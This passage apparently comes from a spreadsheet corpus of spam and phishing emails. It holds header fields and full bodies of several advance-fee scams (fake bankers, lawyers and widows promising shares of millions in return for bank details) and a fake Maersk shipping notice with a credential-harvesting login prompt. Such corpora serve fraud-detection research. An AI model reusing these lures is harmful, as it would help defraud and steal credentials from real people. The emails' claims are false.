you know what needs to be done. You now possess the ideas, information, materials, and opportunity to become financially independent and reach your highest dreams.  I hope you come along for the ride, it's a wonderful world ahead. Copyright CashByNet 2000 ================================================= [URL]http://www.cashbynet.net[/URL] The following message was sent to you as a valued webMillion member. If you wish to unsubscribe please click here: [URL]http://www.webmillion.com[/URL]</t>
  </si>
  <si>
    <t>http://www.cashbynet.net http://www.cashbynet.net http://www.cashbynet.net http://www.cashbynet.net http://www.cashbynet.net http://www.webmillion.com</t>
  </si>
  <si>
    <t>1929</t>
  </si>
  <si>
    <t>To: nan\nFrom: RAMOS HAMZA &lt;ramoshamza@aol.com&gt;\nDate: Tue, 21 Mar 2006 19:35:30 -0600</t>
  </si>
  <si>
    <t>Tue, 21 Mar 2006 19:35:30 -0600</t>
  </si>
  <si>
    <t>RAMOS HAMZA &lt;ramoshamza@aol.com&gt;</t>
  </si>
  <si>
    <t>THANKS</t>
  </si>
  <si>
    <t>RAMOS HAMZA&amp; Co Chambers,\nLegal Practitioners\nSolicitors At Law\nNo: 55 Pyne Cresent,\nVictoria Island,\nLagos-Nigeria\n\n\n\nRE:Attention,\nI am barrister RAMOS HAMZA, the Legal Adviser and counsel to adeceased \nexpatriate contractor (Eng.Arthur) who used to work with Zenith Oil and \nGas Company here in Nigeria thereafter shall be referred to as my late \nclient.\n\nOn the 26th December 2004, my client and his entire family died while\non Vacation at Phuket Island in Thailand as a result of the Asia Earth\nQuake Disaster(TSUNAMI DISASTER) You will read more stories about the \ncrash  on  visiting this\n[URL]http://www.cnn.com[/URL]\nMeanwhile, On the 6th of January 2005,I recieved a phone call as his\npersonal Attorney where the tragic news of my clients death in the\nTsunami disaster was broke to me.\n\nAnd since then, I have made several enquiries to locate any of his\nextended relatives.This has proved unsuccessful hence I contacted you\nin my attempt to trace any member of his family over the internet.\nTherefore, I am seeking  your consent and assistance in repartriating\nmoney  left behind by my late client before it gets confiscated or\ndeclared unserviceable by the bank where the deposit is\nlodged. The deposit is valued US$5,200,000.00 (Five Million; Two\nThousand  United States Dollars) only and it is lodged with Linkworld\nInternational  Bank Nigeria Plc.\n\nThe management board of the bank, after their executive meeting\nfortnight  ago, mandated me to provide his next of kin to inherit the\nfunds  the deceased left behind or else, it will be declared non \nclaimable hence the bankers intend to invoke the abandoned property \ndecree of 1996 to confiscate the funds after the expiration of the \nperiod given to me.\n\nI hereby seek your consent to present you to the bank as next-of-kin of\nthe deceased, so that the proceeds of this account valued\nUS$5,200,000.00 can be transferred to you as the heir to the deceased, \nand thereafter  you,and I will share the money at the ratio of 50% to \nme and 45% to you,  while 5% will be donated to the Tsunami Disaster \nCharity Fund.\n\nI guarantee that the transaction will be executed under a legitimate\narrangement that will protect you from any breach of the law hence all\nthe necessary legal documents that will be required of you by the\nmanagement of the bank in backing up your claims will be duly processed \n  and obtained from the necessary authorities.\nTo commence this process, it is very important that you provide with me\nthe following information,\n\n1.Your name and contact address in full.\n2.Your Telephone and fax numbers.\n3.Your Occupation/company's name and address.\n4.Your age and marital status.\n\nAs soon as I recieve the above stated information, I will file-in a\nformal application on your behalf to the bank for them to commence the\nprocess of  transferring the fund into your designated bank account as \nthe next  of kin to my deceased client.\n\nYours truly,\nRAMOS HAMZA (ESQ)\n\n\n\n</t>
  </si>
  <si>
    <t>1928</t>
  </si>
  <si>
    <t>To: nan\nFrom: bala &lt;tomson@sunumail.sn&gt;\nDate: Tue, 21 Mar 2006 06:57:19 -0000</t>
  </si>
  <si>
    <t>Tue, 21 Mar 2006 06:57:19 -0000</t>
  </si>
  <si>
    <t>bala &lt;tomson@sunumail.sn&gt;</t>
  </si>
  <si>
    <t>TREAT VERY CONFIDENTIAL &amp; URGENT RESPONSES.</t>
  </si>
  <si>
    <t>&gt;From The Desk Of BALA TOMSON (Esq).\nThe Head Of File Department,\nAfrican Development Bank A.D.B\nOuagadougou Burkina-Faso West Africa.\nPhone (00226-7885 75 97)\nPLANE CRASH WEB  SITE...[URL]http://news.bbc.co.uk[/URL]\n\n                                 ("REMITTANCE OF $15 MILLION U.S.A DOLLARS\n                                                 CONFIDENTIAL IS THE\nCASE")\n\nCompliment Of The Season,\n\nOn a very good day. I am (bala tomson Esq),the Head of file Department in\nAfrican developent bank (ADB).I got your contact from Yahoo tourist\nsearch.\n\nWhen i was searching for a foreign partner i assured of your capability\nand reliability to champion this businees opportunity when i prayed to God\nor Allah about you.In my department we discovered an abandoned sum of $ 15\nmillion U.S.A dollars ( fifteen million U.S.A dollars) . In an account\nthat belongs to one of our foreign customer who died along with his entire\nfamily in (Monday 31st July 2000) in a plane crash. Since we got\ninformation about his death, we have been expecting his next of kin to\ncome over and claim his money because we cannot release it unless somebody\napplies for it as next of kin or relation to the deceased as indicated in\nour banking guidelines, but unfortunately we learnt that all his supposed\nnext of kin or relation died alongside with him at the plane crash leaving\nnobody behind for the claim.\n\n It is therefore upon this discovery that I and one official in my\ndepartment now decided to make this businness proposal to you and release\nthe money to you as the next of kin or relation to the deceased for safety\nand subsequent disbursement since nobody is coming for it and we dont\nwant this money to go into the bank treasury as unclaimed bill.\n\nThe Banking law and guideline here stipulates that if such money remained\nunclamed after five years, the money will be transfered into the Bank\ntreasury as unclaimed fund. The request of foreigner as next of kin in\nthis business is occasioned by the fact that the customer was a foreigner,\nand a Burkinabe cannot stand as next of kin to a foreigner. We agree that\n30 % of this money will be for you as foreign partner, in respect to the\nprovision of a foreign account, 10 % will be set aside for expenses\nincured during the business and 60 % would be for me and my woman\ncolleague. There after i will visit your country for disbursement\naccording to the percentages indicated.\n\nTherefore to enable the immediate trnansfer of this fund to you as\narranged, you must apply first to the bank as relations or next of kin of\nthe deceased indicating your bank name, your bank account number, your\nprivate telephone and fax number for easy and effective communication and\nlocation where the money will be remitted.\n\nUpon receipt of your reply, I will send to you by fax or email the text of\nthe application I will not fail to bring to your notice that this\ntransaction is hitch free and that you should not entertain any atom of\nfear as all required arrangements have been made for thetransfer.\n\nYou should contact me on my number (00226-7885 75 97) immediately as soon\nas you receive this letter. Trusting to hear from you immediately.  Yours\nfaithfully,\n\nBALA TOMSON (Esq.)\n\n\nPOST SCRITUM:You have to keep everything secret as to enable the transfer\nto move very smoothly in to the account you will prove to the bank.As you\nfinished reading this letter call me immediately so that we discuss very\nwell over this business.\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n</t>
  </si>
  <si>
    <t>457</t>
  </si>
  <si>
    <t>To: jose@monkey.org\nFrom: Maersk Line &lt;Vaibhav.More@maersk.com&gt;\nDate: Tue, 21 Jun 2016 13:20:48 -0700</t>
  </si>
  <si>
    <t>Tue, 21 Jun 2016 13:20:48 -0700</t>
  </si>
  <si>
    <t>Maersk Line &lt;Vaibhav.More@maersk.com&gt;</t>
  </si>
  <si>
    <t>MAERSK LINE PRO-FORMA DETENTION INVOICE/COC/BL</t>
  </si>
  <si>
    <t>Dear Customer,  	            Hello dear, jose@monkey.org, 	       Please kindly find revised attached Shipping Documents/ Invoice/packing list and copy of BL draft. Please confirm accordingly if your address is correct, before we submit to our outlet office for dispatch to your destination.  Notice!: next shipping schedule will take place on 30th of jun, 2016.    Please provide the following details. Consignee Name:  Consignee Address:  Consignee Telephone Number:  Notify Party:  Notify Party Address:  Notify Telephone Number:  Port Of Discharge:  Final Destination to be mentioned in the Bill of Lading (If Necessary):      B/L NO: NRB600039500 BK NO:HJC/NBO/046 CONT:HJCU 4967429 SEAL:HD758197 VESSEL:CSCL BRISBANE ETA 8.5.2016  Best Regards,  Maersk Line.  2016 - Maersk International GmbH. All rights reserved. Maersk Line Corporate      Office:	 Maersk (China) Shipping Co. Ltd	     Mobile: +86 592 8126973  Shanghai , Maersk (China) Shipping Co. Ltd. Hotline: +86 577 86008011 Mon-Fri 08:30-17:30        	 Virus-free. [URL]www.avast.com[/URL] 	      Dear Customer, Hello dear, jose@monkey.org, Please kindly find revised attached Shipping Documents/ Invoice/packing list and copy of BL draft. Please confirm accordingly if your address is correct, before we submit to our outlet office for dispatch to your destination.  Notice!: next shipping schedule will take place on 30th of jun, 2016.   Please provide the following details.Consignee Name: Consignee Address: Consignee Telephone Number: Notify Party: Notify Party Address: Notify Telephone Number: Port Of Discharge: Final Destination to be mentioned in the Bill of Lading (If Necessary):    B/L NO: NRB600039500BK NO:HJC/NBO/046CONT:HJCU 4967429SEAL:HD758197VESSEL:CSCL BRISBANE ETA 8.5.2016 Best Regards, Maersk Line. 2016 © Maersk International GmbH. All rights reserved. Maersk Line Corporate Office: Maersk (China) Shipping Co. Ltd Mobile: +86 592 8126973 Shanghai , Maersk (China) Shipping Co. Ltd. Hotline: +86 577 86008011 Mon-Fri 08:30-17:30 Virus-free. [URL]www.avast.com[/URL]   SHIPPING DOCUMENT Login Your Email To View Bill of Lading and Invoice Document. Email Password   Remember Me</t>
  </si>
  <si>
    <t>www.avast.com www.avast.com</t>
  </si>
  <si>
    <t>1362</t>
  </si>
  <si>
    <t>To: g_kamara@plasa.com\nFrom: g_kamara &lt;g_kamara@plasa.com&gt;\nDate: Tue, 21 Jun 2005 18:24:31 +0700</t>
  </si>
  <si>
    <t>Tue, 21 Jun 2005 18:24:31 +0700</t>
  </si>
  <si>
    <t>g_kamara &lt;g_kamara@plasa.com&gt;</t>
  </si>
  <si>
    <t>g_kamara@plasa.com</t>
  </si>
  <si>
    <t>\nATT PLEASE\n\nGREETING SIR ,I WRITE TO INSTIMATE YOU OF A MATTER THAT \nREQUIRED AN URGENT\nATTENTION WITH REGARDS TO YOUR REPOSED PERSONALITY AS \nRELIABLE ,TRUSTWORTHY\nAND GOD FEARING PERSON. WE GOT YOUR E-MAIL ADDRESS FROM \nECOWAS COMMITTE\nDURING THEIR LAST ORITENTATONAL PROGRAM IN OUR REFUGEE \nSCAMP.\n\nIN BRIEF INTRODUCTION,I AM THE ONLY SON OF LATE MR ADAMS \nKamara FROM SIERRA-LEONE.I\nAM PRESENTLY STAYING IN ABIDJAN COTE D'IVOIRE AS A \nREFUGEES MY FATHER WAS\nONE OF THE MINISTERS OF JOHNNY PAUL KOROMAH'S REGIME IN \nSIERRA-LEONE.DURING\nTHE INTERVENTION OF THE ECOMOG SOLDIERS TO RESTORE THE \nPRESIDENCY OF ALHJI\nTEJAN KABBAH FROM JOHNNY KOROMAH,MY FATHER AND MY MOTHER \nWAS AMONG THE 23\nEXECUTED MINISTERS,\n\nBUT BEFORE THE DEATH OF MY FATHER AND MY MOTHER THERE WAS \nA DEPOSIT OF USD\n18 MILLION MADE BY MY LATE FATHER IN ONE OF THE FINACIAL \nPRIVATE SECURITY\nCOMPANY IN COTE D'IVOIRE,WHICH HE USE MY NAME AS THE ONLY \nSON, AS THE NEXT\nOF KIN,AND HE REGISTERD THE DEPOSIT AS FAMILY VALUABES,BUT \nMY CONDITION\nAND POSSIBILITIES MAKES IT VERY DIFFICULT FOR ME TO \nAPPROACH ANY PERSON\nFOR RECOMMENDATION,EVER SINCE THEN I HAVE BEEN RECEIVING \nHELP FROM OUR MISSION\nBECAUSE I AM STAYING IN ONE OF THE VISITORS VILLA IN THE \nCHURCH PREMISES\nAND ATTEND FELLOWSHIP AND WORSHIP FULLY.I HOPE YOU WILL BE \nTOUCHED TO UNDERSTAND\nMY REQUEST .\n\nYOU WILL PROVIDE OR LOOK FOR A LUCRATIVE VENTURE WHERE \nTHIS MONEY CAN BE\nINVESTED ON, TOGETHER WITH YOU.I HAVE AGREED TO INVEST MY \nMONEY\nVIABLE IN ANY OVERSEAS COUNTRY THROUGH YOUR ASSISTANCE AND \nDIRECTIVES BEFORE\nPROCEEDING WE WILL GET TO BE MORE FAMILIAR AND ALSO GO \nINTO AN UNDERSTANDING\nWORKING AGREEMENT BECAUSE MY LIFE FUTURE NOW DEPENDS ON \nTHIS VERY MONEY.THE\nBOX CONTAINING THE MONEY IS DEPOSITED AND REGISTERED AS \nFAMILY TREASURE\nTHIS WAS DONE FOR SECURITY REASONS .\n\nI HAVE AGREED TO GIVE YOU 20% OF THE TOTAL SUM OF USD18 \nMILLION FOR YOUR\nASSISTANCE TO ME.I SINCERELY WISH TO INTRODUCE AND MAKE \nYOU MY BUSINESS\nPARTNER AND ADVISORY CONSULTANT OF MY PROPOSED INVESTMENT \nIN YOUR COUNTRY.SO\nIF YOU CAN BE ABLE TO ASSIST ME ,PLEASE DO URGENTLY REPLY \nME SO THAT I WILL\nLINK YOU FOR FURTHER DETAILS,AND DON'T FORGET TO GIVE ME \nYOUR PRIVATE TELEPHONE\nAND FAX NUMBERS WHILE REPLYING THIS LETTER. THANKS AND GOD \nBLESS YOU .\n\nYOURS SINCERELY\nGeorge Kamara\n========================================================================================\nDapatkan kemudahan layanan Mobile Email dari VENTUS untuk Personal, VENTUS Easy. \n\nKlik [URL]http://easy.ventusmobile.com[/URL]\n======================================================================================== \n\n\n</t>
  </si>
  <si>
    <t>http://easy.ventusmobile.com</t>
  </si>
  <si>
    <t>1826</t>
  </si>
  <si>
    <t>To: prince44hassan@caramail.com\nFrom: prince44hassan &lt;prince44hassan@caramail.com&gt;\nDate: Tue, 21 Feb 2006 23:41:41 +0000</t>
  </si>
  <si>
    <t>Tue, 21 Feb 2006 23:41:41 +0000</t>
  </si>
  <si>
    <t>prince44hassan &lt;prince44hassan@caramail.com&gt;</t>
  </si>
  <si>
    <t>prince44hassan@caramail.com</t>
  </si>
  <si>
    <t>From The Desk Of Prince Hassan (Esq).The Head Of File Department,African Development Bank A.D.BOuagadougou Burkina-Faso West Africa.Phone: 00226-7885 75 97.   PLANE CRASH WEB SITE...[URL]http://news.bbc.co.uk[/URL]                         ("REMITTANCE OF $15 MILLION U.S.A DOLLARS                                        CONFIDENTIAL IS THE CASE")         Compliment Of The Season,  On a very good day. I am (Prince  Hassan Esq),The Head of file Department in African developent bank (ADB).I got your contact from Yahoo tourist search. When i was searching for a foreign partner i assured of your capability and reliability to champion this businees opportunity when i prayed to God or Allah about you.In my department we discovered an abandoned sum of $ 15 million U.S.A dollars ( fifteen million U.S.A dollars) . In an account that belongs to one of our foreign customer who died along with his entire family in (Monday 31st July 2000) in a plane crash. Since we got information about his death, we have been expecting his next of kin to come over and claim his money because we cannot release it unless somebody applies for it as next of kin or relation to the deceased as indicated in our banking guidelines, but unfortunately we learnt that all his supposed next of kin or relation died alongside with him at the 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   The Banking law and guideline here stipulates that if such money remained unclamed after five years, the money will be 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 me and my woman colleague. There after i will visit your country for disbursement according to the percentages indicated.  Therefore to enable the immediate trnansfer of this fund to you as arranged, you must apply first to the bank as relations or next of kin of the deceased indicating your bank name, your bank account number, your private telephone and fax number for easy and effective communication and location where the money will be remitted.Upon receipt of your reply, I will send to you by fax or email the text of the application I will not fail to bring to your notice that this transaction is hitch free and that you should not entertain any atom of fear as all required arrangements have been made for thetransfer.    You should contact me on my number 00226-7885 75 97, immediately as soon as you receive this letter. Trusting to hear from you immediately. Your’s faithfully,  Prince  Hassan  (Esq.)   POST SCRITUM:You have to keep everything secret as to enable the transfer to move very smoothly in to the account you will prove to the bank.As you finished reading this letter call me immediately so that we discuss very well over this business.</t>
  </si>
  <si>
    <t>1822</t>
  </si>
  <si>
    <t>To: nan\nFrom: john moka &lt;john_moka3@hotmail.com&gt;\nDate: Tue, 21 Feb 2006 13:52:56 +0000</t>
  </si>
  <si>
    <t>Tue, 21 Feb 2006 13:52:56 +0000</t>
  </si>
  <si>
    <t>john moka &lt;john_moka3@hotmail.com&gt;</t>
  </si>
  <si>
    <t>LOOKING FORWARD TO YOUR PROMPT RESPONSE</t>
  </si>
  <si>
    <t>email:mkjn45@hotmail.com\n\nCOMPLIMENTS OF THE DAY MA/SIR.\n\nI am JOHN MOKA the chief accountant of Amalgamated Bank of South\nAfrica (ABSA). There is an account opened in this bank in 1999 and since \n2001 nobody has operated on this account again. After going through some old \nfiles in the records, I discovered that if I do not remit this money out \nurgently it would be forfeited for nothing. The owner of this account is Mr. \nMorris Thompson, a foreigner, Business Man and a miner at Kruger Gold \nCompany, a Geologist by profession and he died since 2000. Ever then no \nother person knows this account or anything concerning it, the account has \nno other beneficiary and my investigation proved to me as well that this \ncompany does not know anything about this account and the money involved is \nOne hundred and Thirty Six Million United States Dollars (US$ 136 Million).  \nI want\nus to first transfer US$ 36 Million from this money into your safe\noverseas account before the rest. I am only contacting you as a foreigner \nbecause this money cannot be approved to a local bank here, but can only be \napproved to any foreign account because the money is in United States \nDollars and the former owner Mr. Morris Thompson is a foreigner too. I know \nthat this message will come to you as surprise as we don�t know ourselves \nbefore.\n\nWe will sign an agreement, but be sure that it is real and a genuine\nbusiness. You can view the web site bellow for more information on our late \nclient.\n\n[URL]http://archives.cnn.com[/URL]\n\nI only got your contact information from my secretary who operates\ncomputer; with believe in God that you will never let me down in this \nbusiness, considering my position as a public servant. You are the only \nperson that I have contacted in this business; so please reply urgently so \nthat I will inform you the next step to take immediately. Send also your \nprivate telephone and fax numbers including the full details of your account \nto be used for the deposit. I want us to meet face-to-face and sign a \nbinding agreement to bind us together so that you can receive this money \ninto your account where the fund will be safe. And I will fly to your \ncountry for withdrawal and sharing and other investment.\n\nMeanwhile, I am contacting you because of the need to involve a foreigner \nwith foreign account and foreign beneficiary. I need your full co-operation \nto make this work fine because the management is ready to approve this \npayment to any foreigner who has correct information of this account, which \nI will give to you as soon as you indicate your sincerity to co-operate with \nme, and capability to handle such amount in strict confidence and trust \naccording to my instruction and advice for our mutual benefit because this \nopportunity may never come again in my life. I need a truthful and God \nfearing person in this business because I don�t want to make a mistake so I \nneed your strong assurance and trust. With my position in the office I don�t\nwant anything that will jeopardize my job so I advice that we should make \nsecrecy and confidentiality our primary working condition, bearing in mind \nthat I am a public servant. I will also use my position and influence to \neffect legal approvals and onward transfer of this money to your account \nwith appropriate clearance forms of the ministries and foreign exchange \ndepartment.\n\n\nAt the conclusion of this business, you will be giving 25% of the total\namount, 70% will be for me, while 5% will be for expenses both parties might \nhave incurred the process of the transfer. I look forward to your\nearliest reply.\n\nYours sincerely,\nJOHN MOKA\nCONFIDENTIAL\n\n_________________________________________________________________\nFind just what you're after on your PC with Windows Desktop Search - FREE! \n[URL]http://desktop.msn.co.za[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>http://archives.cnn.com http://desktop.msn.co.za</t>
  </si>
  <si>
    <t>1048</t>
  </si>
  <si>
    <t>To: spritwind@hanmail.net\nFrom: mrvictorkovis@excite.co.uk\nDate: Tue, 21 Dec 2004 17:58:37 +0100</t>
  </si>
  <si>
    <t>Tue, 21 Dec 2004 17:58:37 +0100</t>
  </si>
  <si>
    <t>mrvictorkovis@excite.co.uk</t>
  </si>
  <si>
    <t>spritwind@hanmail.net</t>
  </si>
  <si>
    <t>GOOD DAY FRIEND</t>
  </si>
  <si>
    <t>CHALLENGE SECURITIES LTD.\nLAGOS, NIGERIA\n\nGOOD DAY FRIEND\n\nATTENTION:SIR/MADAM\n\nI am MR.VICTOR KOVIS, the Director of Operations\nCHALLENGE SECURITIES LTD,LAGOS NIGERIA. Here in\nNIGERIA Our firm is a security company of high repute\nwith years of outstanding service to the people of\nAfrica.\n\nI have resolved to contact you through this medium\nbased on business proposal that will be of mutual\nbenefit to both of us. I got your particulars through\na consultant company base on my research for a\ntrustworthy and established person that understands\ninvestment ethic for entering into a life time\nprofitable joint partnership investment and also\nco-operation with confidence and trust that you will\nkeep the contents secret and divulged to any third\nparty.\n\nTo be explicit and straight to the point. Some time\nearly 1997, a reputable client of o! urs deposited a\nconsignment in our company's vault for safe keeping.\nAnd since then our client has failed to come forward\nto claim his consignment, which has accumulated a\nconsiderable amount of money in demurrage.\n\nConsequently, in our bide to contact this client to\nredeem the demurrage which his consignment had\naccumulated we discovered that our client was the\nformer president of the Federal Republic of Zaire, who\ndied of illness after he was de-throwed in the same\nyear the consignment was entrusted into our care.\n\nSince the death of our client President Mobutou\nSeseseko, none of his benefactors has come forward to\nclaim the consignment with us, which means that non of\nhis relatives or aids had any knowledge of this\nconsignment. Hence out of curiosity I decided to\nsecretly open the two boxes that our client deposited\nin our vault. And to my surprise I discovered that the\ntwo boxes that were registered as treasure! r by our\nclient actually contained a considerable amount of\nmoney in United States Dollars amounting to about\nUS$30 million Dollar. Since this development I have\nbeen nursing plans secretly. I also found out from\nenquiries and the foreign media that our late client\nsiphoned a lot of money from his country while he was\nin office as head of state.\n\nIt is my conviction that the consignment in our vault\nwas part of the money that our client siphoned and now\nthat he is dead there is no race to this money in our\ncare.\n\nI am now soliciting your noble assistance to assist me\nin transferring this money out of nigeria to your\ncountry for immediate investment with your assistance.\nI have also decided that you will generously be\nentitled to 30% of the total amount. Upon my receipt\nof your reply confirming your willingness to assist me\nof this transaction, I will immediately arrange and\ntransfer all the rights of ownership of thisconsignment to\nyour name to facilitate your easy clearance and transfer of the\n\ncomplete funds to your\ncountry.\n\nyou have nothing to worry about, as I will be there\nto assist you in anyway necessary with all proper\ndocumentation.\n\nThis transaction is 100% risk free.\n\nPlease maintain absolute confidentiality on this\nmatter.\n\nPlease reply to the above email address with your\ntelephone and fax so that i can call you.\n\nThanks.\n\nYours faithfully.\nMR.VICTOR KOVIS\n\n\n\n-------------------------------------------------\nsent by Excite Inbox - [URL]http://inbox.excite.co.uk[/URL]\n\npowered by Excite UK - [URL]http://www.excite.co.uk[/URL]\n\n\n\n\n</t>
  </si>
  <si>
    <t>http://inbox.excite.co.uk http://www.excite.co.uk</t>
  </si>
  <si>
    <t>1492</t>
  </si>
  <si>
    <t>To: nan\nFrom: MRS.SUZANA VAYE &lt;suzanavaye2@o2.pl&gt;\nDate: Tue, 20 Sep 2005 22:20:48 +0200</t>
  </si>
  <si>
    <t>Tue, 20 Sep 2005 22:20:48 +0200</t>
  </si>
  <si>
    <t>MRS.SUZANA VAYE &lt;suzanavaye2@o2.pl&gt;</t>
  </si>
  <si>
    <t>\nNAME:MRS. SUZANA NUHAN VAYE\n\n%BARR.JAMES BRODERICK (ATTORNEY)\n\nTEL/FAX:44-70-40120730\n\nEMAIL:jamesbroderick009@yahoo.fr\n\nEMAIL:jbroderick@kaixo.com\n\nEMAIL:barrbroderick009@excite.com\n\n\n\n\n\nATTN: MD/CEO\n\n\n\n\n\nKindly accept my apology for sending my mail to you.Please, I sincerely wish to let you know that this is not the kind of e-mails that you will refer to as "spam" or it's like. I am genuine and my attorney will prove it to you once he hear from you.Please help me out in this my condition. I believe you are a highly respected personality,considering the fact that I sourced your profile from a human resource\n\nprofile database on your country in the Internet.\n\n\n\nThough, I do not know to what extent you are familiar with events and fragile political situation in Liberia but it has formed consistent headlines in the CNN, BBC news bulletins.\n\n\n\n\n\nMy Name is MRS.SUZANA NUHAN VAYE from Liberia,a Country in West Africa. My late Husband is Issac Nuhan Vaye, Deputy Minister of Publ ic Works in Liberia. My Husband was falsely accused of plotting to remove the then PRESIDENT OF LIBERIA CHARLES TAYLOR) from office.Without trial, Charles Taylor killed him. You can verify this from some of the \n\ninternational newspapers posted in the web sites below:\n\n\n\n\n\n(I)[URL]http://www.usatoday.com[/URL]\n\n\n\nBefore my husband was killed, he moved out the sum of $21.5 million through a diplomatic means, and deposited it with a Security Company Abroad. And this money was meant for importation of agriculturalmachinery.\n\n\n\n\n\nAll that is needed is for my lawyer to instruct the company to transfer the funds to your account, I will remunerate you with 20% at the end, but most of all is that I solicit your trust and honesty in this transaction. I have been confined only to our country home and all my calls are monitored, so I wil l advise you to contact my private Attorney Barr.James Broderick base in United Kingdom on his contact stated below for onward proceedings: -\n\n\n\n\n\nNAME:BARR.JAMES BRODERICK(ATTORNEY)\n\nTEL/FAX:44-70-40120730\n\nEMAIL:jamesbroderick009@yahoo.fr\n\nEMAIL:jbroderick@kaixo.com\n\nEMAIL:barrbroderick009@excite.com\n\n\n\n\n\nKindly include your Full Name,Residential or Company Address, Private Telephone, Mobile and Fax Number where you can always be reached,to enable him send details/documents that will enable you receive the fund without any problem either now or in future as allmodalities as been perfected.\n\n\n\n\n\nPlease your urgent response is needed.\n\n\n\n\n\nGod bless you.\n\n\n\n\n\nBest Regards.\n\n\n\n\n\nMRS.SUZANA NUHAN VAYE (WIDOW)\n\n\n\n\n\n\n\n___________________________________________________________________________\nWiadomo wysana z witryny [URL]http://lukaty.prv.pl[/URL]\n\n\n</t>
  </si>
  <si>
    <t>http://www.usatoday.com http://lukaty.prv.pl</t>
  </si>
  <si>
    <t>2981</t>
  </si>
  <si>
    <t>To: nan\nFrom: clive whittaker &lt;leefprivatebox@paginasamarillas.com&gt;\nDate: Tue, 20 Mar 2007 10:05:39 -0500</t>
  </si>
  <si>
    <t>Tue, 20 Mar 2007 10:05:39 -0500</t>
  </si>
  <si>
    <t>clive whittaker &lt;leefprivatebox@paginasamarillas.com&gt;</t>
  </si>
  <si>
    <t>hello</t>
  </si>
  <si>
    <t>\nHello,\nThis is Dr.Clive Whittaker. I work for Fidelity Investment Uk as Head \nof fund manager in charge of London &amp; Channel Island.\ni handle all our Investors Treasury Bill Deposit that gives me access \nto trade with our Investors Funds on Private Arrangement. In addition, \nI have made an average of $42.870m?through Private Trading with our \nInvestors Treasury Bill Deposit while the said funds are currently \nlying as a Floating Capital in our Treasury Bill Magellan Trust \nAccount. Neverthles, I am not permitted by law to own or keep the above \nmentioned amount as my personal funds without declaration of source and \norigin of the funds to the UK Government and to the Management of \nFidelity Investment. Therefore, I need someone that will work with me \nto claim the aforementioned funds as an investor without fear or \nfavour. If you are interested, I will provide you with more details on \nhow this deal works.\n\nThis is a fair deal without any risk attached and will be legally \ntransacted. Our sharing ratio is 60:40.if you are intrested in this \ndeal you get back to me asap for futher details. reply me with my \nprivate email box, leefprivatebox@yahoo.com.hk,\n\nKind Regards.\nDr.Clive Whittaker\n[URL]www.fidelity.co[/URL]\n\n\n\n\n\n----------------------------------------------------------------\nThis message was sent using IMP, the Internet Messaging Program.\n\n\n\n</t>
  </si>
  <si>
    <t>www.fidelity.co</t>
  </si>
  <si>
    <t>2236</t>
  </si>
  <si>
    <t>To: nan\nFrom: patrice kone &lt;patrice_kone18@hotmail.com&gt;\nDate: Tue, 20 Jun 2006 12:41:51 +0000</t>
  </si>
  <si>
    <t>Tue, 20 Jun 2006 12:41:51 +0000</t>
  </si>
  <si>
    <t>patrice kone &lt;patrice_kone18@hotmail.com&gt;</t>
  </si>
  <si>
    <t>FROM THE DESK OF  PATRICE KONE.</t>
  </si>
  <si>
    <t>FROM THE DESK OF  PATRICE KONE (Esq).\nTHE MANAGER IN CHARGE OF AUDITING\nAND ACCOUNTING UNIT FOREIGN\nREMITTANCE DEPARTMENT OF\nDEVELOPMENT BANK (ADB)\nOUAGA-BURKINA FASO IN WEST AFRICA.\n\nPLANE CRASH WEB SITE..[URL]http://news.bbc.co.uk[/URL]\n                        ("REMITTANCE OF $15 MILLION U.S.A DOLLARS\n                          &amp;nbs p;  CONFIDENTIAL IS THE CASE")\n\nCompliment Of The Season,\nOn a very good day. I am (PATRICE KONE  Esq),The Head of file Department in \nAfrican developent bank (ADB).I got your contact from Yahoo tourist search.\nWhen i was searching for a foreign partner i assured of your capability and \nreliability to champion this businees opportunity when i prayed to God or \nAllah about you.In my department we discovered an abandoned sum of $ 15 \nmillion U.S.A dollars ( fifteen million U.S.A dollars) . In an account that \nbelongs to one of our foreign customer who died along with his entire family \nin (Monday 31st July 2000) in a plane crash. Since we got information about \nhis death, we have been expecting his next of kin to come over and claim his \nmoney because we cannot release it unless somebody applies for it as next of \nkin or relation to the deceased as indica ted in our banking guidelines, but \nunfortunately we learnt that all his supposed next of kin or relation died \nalongside with him at the plane crash leaving nobody behind for the claim. \nIt is therefore upon this discovery that I and one official in my department \nnow decided to make this businness proposal to you and release the money to \nyou as the next of kin or relation to the deceased for safety and subsequent \ndisbursement since nobody is coming for it and we dont want this money to \ngo into the bank treasury as unclaimed bill.The Banking law and guideline \nhere stipulates that if such money remained unclamed after five years, the \nmoney will be transfered into the Bank treasury as unclaimed fund. The \nrequest of foreigner as next of kin in this business is occasioned by the \nfact that the customer was a foreigner, and a Burkinabe cannot stand as next \nof kin to a foreigner. We agree that 30 % of this money will be for you as \nforeign partner, in respect to the provision of a foreign account, 10 % will \nbe set aside for expenses incured during the business and 60 % would be for \nme and my woman colleague. There after i will visit your country for \ndisbursement according to the percentages indicated. Therefore to enable the \nimmediate trnansfer of this fund to you as arranged, you must apply first to \nthe bank as relations or next of kin of the deceased indicating your bank \nname, your bank account number, your private telephone and fax number for \neasy and effective communication and location where the money will be \nremitted.Upon receipt of your reply, I will send to you by fax or email the \ntext of the application I will not fail to bring to your notice that this \ntransaction is hitch free and that you should not entertain any atom of fear \nas all required arrangements have been made for thetransfer.\n\nYours faithfully,\n\nPATRICE KONE (Esq.)\n\nPOST SCRITUM:You have to keep everything secret as to enable the transfer to \nmove very smoothly in to the account you will prove to the bank.As you \nfinished reading this letter call me immediately so that we discuss very \nwell over this business.\n\n______________________________________________________________________\n\nJe suis le directeur du bureau de changes  la BAD-burkina. Je m'appelle Dr  \nPatrice Kone.\nDans mon dpartement,il a t dcouvert une importante somme d'argent qui \nappartenait  un de nos clients qui mourut lors d'un accident d'avion en \njuillet 2000 avec sa famille entire ne laissant personne pour rclamer \ncette fortune qui s'lve  $15 M USD(amricains).Vous pouvez avoir plus \nd'informations de cet accident sur ce site \nWeb:[URL]http://news.bbc.co.uk[/URL]\nDepuis lors, personne ne s'est prsent pour rclamer cette somme qui se \ntrouve dans notre banque. Or, les rglements bancaires en Afrique stipulent \nque, si une telle somme reste sans revendication aprs une priode de \n5ans,ceci doit tre vire dans dans le compte de trsor bancaire. C'est afin \nd'viter que ce fond profite au gouvernement burkinab que mon collgue et\nmoi avons dcid de chercher un partenaire tranger qui peu nous aider  \nfaire transfrer cette somme dans son compte bancaire. Ceci dit, vous devrez \nvous prsenter au niveau de la banque 